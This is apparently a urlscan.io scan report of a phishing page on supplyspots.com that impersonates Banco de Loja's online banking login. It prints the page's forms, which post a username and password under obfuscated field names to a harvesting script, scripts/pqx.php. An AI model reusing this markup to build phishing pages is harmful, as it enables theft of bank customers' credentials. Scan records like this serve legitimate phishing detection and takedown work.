supplyspots.com Open in urlscan Pro
2400:8901::f03c:91ff:fea9:ecb6  Public Scan

URL: https://supplyspots.com/home/coincheck/feed/lojia/index.html
Submission: On April 25 via api from HU — Scanned from JP

Form analysis 2 forms found in the DOM

POST scripts/pqx.php

<form method="post" action="scripts/pqx.php" id="form1">
  <div class="aspNetHidden" bis_skin_checked="1">
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="sR1JvFXJXtesJ/zLEtLh70bCC2m/hcvOXhZJqAjCCX2BGKWCKwJj0Twt2ztLUv7dCKof877I60yNBDn3zk1zHaKdkcMuL9UK+nfi10Z5XJCSIowWw23dOFrSDOc1uFnZ3JwXLw==">
  </div>
  <script src="scripts/controller.js?v7.1" type="text/javascript"></script>
  <script type="text/javascript">
    //<![CDATA[
    var PageMethods = function() {
      PageMethods.initializeBase(this);
      this._timeout = 0;
      this._userContext = null;
      this._succeeded = null;
      this._failed = null;
    }
    PageMethods.prototype = {
      _get_path: function() {
        var p = this.get_path();
        if (p) return p;
        else return PageMethods._staticInstance.get_path();
      },
      IngresarBE: function(dataEncrypt, succeededCallback, failedCallback, userContext) {
        return this._invoke(this._get_path(), 'IngresarBE', false, {
          dataEncrypt: dataEncrypt
        }, succeededCallback, failedCallback, userContext);
      },
      Page_Load: function(succeededCallback, failedCallback, userContext) {
        return this._invoke(this._get_path(), 'Page_Load', false, {}, succeededCallback, failedCallback, userContext);
      },
      btnActivarBancaE_DirectClick: function(dataEncrypt, succeededCallback, failedCallback, userContext) {
        return this._invoke(this._get_path(), 'btnActivarBancaE_DirectClick', false, {
          dataEncrypt: dataEncrypt
        }, succeededCallback, failedCallback, userContext);
      },
      btnOlvidoClave_DirectClick: function(dataEncrypt, succeededCallback, failedCallback, userContext) {
        return this._invoke(this._get_path(), 'btnOlvidoClave_DirectClick', false, {
          dataEncrypt: dataEncrypt
        }, succeededCallback, failedCallback, userContext);
      }
    }
    PageMethods.registerClass('PageMethods', Sys.Net.WebServiceProxy);
    PageMethods._staticInstance = new PageMethods();
    PageMethods.set_path = function(value) {
      PageMethods._staticInstance.set_path(value);
    }
    PageMethods.get_path = function() {
      return PageMethods._staticInstance.get_path();
    }
    PageMethods.set_timeout = function(value) {
      PageMethods._staticInstance.set_timeout(value);
    }
    PageMethods.get_timeout = function() {
      return PageMethods._staticInstance.get_timeout();
    }
    PageMethods.set_defaultUserContext = function(value) {
      PageMethods._staticInstance.set_defaultUserContext(value);
    }
    PageMethods.get_defaultUserContext = function() {
      return PageMethods._staticInstance.get_defaultUserContext();
    }
    PageMethods.set_defaultSucceededCallback = function(value) {
      PageMethods._staticInstance.set_defaultSucceededCallback(value);
    }
    PageMethods.get_defaultSucceededCallback = function() {
      return PageMethods._staticInstance.get_defaultSucceededCallback();
    }
    PageMethods.set_defaultFailedCallback = function(value) {
      PageMethods._staticInstance.set_defaultFailedCallback(value);
    }
    PageMethods.get_defaultFailedCallback = function() {
      return PageMethods._staticInstance.get_defaultFailedCallback();
    }
    PageMethods.set_enableJsonp = function(value) {
      PageMethods._staticInstance.set_enableJsonp(value);
    }
    PageMethods.get_enableJsonp = function() {
      return PageMethods._staticInstance.get_enableJsonp();
    }
    PageMethods.set_jsonpCallbackParameter = function(value) {
      PageMethods._staticInstance.set_jsonpCallbackParameter(value);
    }
    PageMethods.get_jsonpCallbackParameter = function() {
      return PageMethods._staticInstance.get_jsonpCallbackParameter();
    }
    PageMethods.set_path("Ingreso.aspx");
    PageMethods.IngresarBE = function(dataEncrypt, onSuccess, onFailed, userContext) {
      PageMethods._staticInstance.IngresarBE(dataEncrypt, onSuccess, onFailed, userContext);
    }
    PageMethods.Page_Load = function(onSuccess, onFailed, userContext) {
      PageMethods._staticInstance.Page_Load(onSuccess, onFailed, userContext);
    }
    PageMethods.btnActivarBancaE_DirectClick = function(dataEncrypt, onSuccess, onFailed, userContext) {
      PageMethods._staticInstance.btnActivarBancaE_DirectClick(dataEncrypt, onSuccess, onFailed, userContext);
    }
    PageMethods.btnOlvidoClave_DirectClick = function(dataEncrypt, onSuccess, onFailed, userContext) {
      PageMethods._staticInstance.btnOlvidoClave_DirectClick(dataEncrypt, onSuccess, onFailed, userContext);
    }
    //]]>
  </script>
  <div class="aspNetHidden" bis_skin_checked="1">
    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="99578253">
    <input type="hidden" name="__VIEWSTATEENCRYPTED" id="__VIEWSTATEENCRYPTED" value="">
  </div>
</form>

POST scripts/pqx.php

<form action="scripts/pqx.php" method="post" id="form_login" autocomplete="off" class="v-form">
  <div xs="12" class="pa-0 d-flex flex-column col-md-12 col" bis_skin_checked="1">
    <p class="d-flex txt-normal-color text-subtitle-2 font-weight-regular ma-0"> Usuario </p>
    <div
      class="v-input v-input--hide-details v-input--dense v-input--hide-spin-buttons theme--light v-text-field v-text-field--single-line v-text-field--solo v-text-field--solo-flat v-text-field--is-booted v-text-field--enclosed v-text-field--placeholder my-2 rounded-lg"
      bis_skin_checked="1">
      <div class="v-input__control" bis_skin_checked="1">
        <div class="v-input__slot background" style="height: 50px;" bis_skin_checked="1">
          <div class="v-text-field__slot" bis_skin_checked="1"><input maxlength="20" min="0" autocomplete="one-time-code" id="us4r" placeholder="Ej. usuario123" type="text" name="us4r" required=""></div>
        </div>
      </div>
    </div>
  </div>
  <div xs="12" class="pa-0 d-flex flex-column col-md-12 col" bis_skin_checked="1">
    <p class="d-flex txt-normal-color text-subtitle-2 font-weight-regular ma-0"> Contraseña </p>
    <div
      class="v-input v-input--hide-details v-input--dense v-input--hide-spin-buttons theme--light v-text-field v-text-field--single-line v-text-field--solo v-text-field--solo-flat v-text-field--is-booted v-text-field--enclosed v-text-field--placeholder my-2 rounded-lg"
      bis_skin_checked="1">
      <div class="v-input__control" bis_skin_checked="1">
        <div class="v-input__slot background" style="height: 50px;" bis_skin_checked="1">
          <div class="v-text-field__slot" bis_skin_checked="1"><input maxlength="24" min="0" autocomplete="one-time-code" id="p4sx" placeholder="Ingresa tu contraseña" type="text" name="p4sx" required=""></div>
          <div class="v-input__append-inner" bis_skin_checked="1"><img src="imgg/ojo.png" alt="logo_banco_de_loja" width="30"> <!----></div>
        </div>
      </div>
    </div>
  </div>
</form>

Text Content




@Copyright 2024 Banco de Loja

Powered by  

Bienvenido a tu Banca Electrónica

Usuario



Contraseña


Olvidaste tu contraseña/Desbloqueo
Ingresar
Activar Banca Electrónica
Abre tu Cuenta en línea aquí

Ayuda

Seguridad

Contacto

@Copyright 2024 Banco de Loja

Se recomienda usar Firefox 88+, Google Chrome 90+, Safari 15+, Opera 88+ o Edge
79+